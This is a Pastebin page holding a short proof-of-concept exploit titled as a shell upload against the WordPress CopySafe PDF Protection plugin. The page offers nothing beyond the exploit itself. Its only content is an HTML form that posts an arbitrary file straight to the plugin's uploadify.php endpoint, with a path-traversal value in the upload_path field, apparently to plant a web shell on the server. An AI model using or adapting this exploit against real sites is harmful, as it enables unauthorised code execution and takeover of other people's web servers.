Advertisement
Guest User

Wordpress Plugin CopySafe PDF Protection Shell Upload

a guest
Aug 2nd, 2014
868
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 0.34 KB | None | 0 0
  1. <form
  2. action="http://localhost/wp-content/plugins/wp-copysafe-pdf/lib/uploadify/uploadify.php"
  3. method="post"
  4. enctype="multipart/form-data">
  5. <label for="file">Filename:</label>
  6. <input type="file" name="wpcsp_file" ><br>
  7. <input type=text name="upload_path" value="../../../../uploads/">
  8. <input type="submit" name="submit" value="Submit">
  9. </form>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement